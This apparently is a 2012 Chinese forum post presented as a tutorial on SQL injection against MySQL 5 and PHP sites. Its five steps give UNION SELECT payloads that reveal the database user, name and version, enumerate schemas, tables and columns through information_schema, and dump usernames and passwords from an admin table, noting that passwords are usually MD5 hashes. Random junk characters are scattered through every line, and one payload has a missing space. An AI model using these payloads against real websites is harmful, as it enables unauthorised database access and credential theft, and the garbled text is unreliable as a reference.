2 c& a1 C6 I# d/ k教程内容:Mysql 5+php 注入2 k" q. [- S2 U X* }* Q6 N
& U0 k7 [8 A! C4 E2 x& m
; Y8 `) w4 ~& ]- Q6 U6 K: q, w" F6 U% C3 q1 C( X
一.查看MYSQL基本信息(库名,版本,用户)5 {( {+ N9 ?" {( h$ C
& h7 E. ]6 o* K- ` y( j" ^and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
) f* e& D4 x! O5 N# c
! F/ i7 Q0 |- _% F U. u二.查数据库* d1 p; N# ]. q; m" q1 ]4 w) J2 X7 E
' G4 K% |$ y& A- O6 c+ z
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*2 K5 e8 J* ]# q# _
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。9 F/ Y' A* t- V/ A& Y
7 e8 P/ k' a2 c# H+ h" M
三.暴表* k& r) R- {7 K) G: H
0 D% V: E6 Y4 W% X& v
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
0 `- i0 |1 J1 S+ O5 m7 H5 z9 c& R
# n4 X2 ]( ?4 w nlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。8 V5 ^5 N) U; y$ f
8 l2 c+ X9 B& _. y3 S四.暴字段2 K9 x, `- e) |. w* h+ k
- x, h& z6 ^* {# S4 u0 g. rand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
1 X+ N8 A% B( W: e/ n2 @9 g' \" v/ m* J% b2 z% A& z4 N3 {
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。) w) V* A l1 R1 D( ?0 t1 q
, I) k: y5 u% m$ `! V5 r# p0 J五.暴数据0 z; E! r7 T8 z2 A2 h+ E+ ]
3 V D6 k7 z. I/ d- m) e# qand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
* [ k( S# Z) q' q: x L) P
2 _; P/ V- F, A5 J# H9 A, m( ?% a
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
5 w/ e [# a! e8 s& A |
发表于 2012-9-13 16:27:53
收藏
支持
反对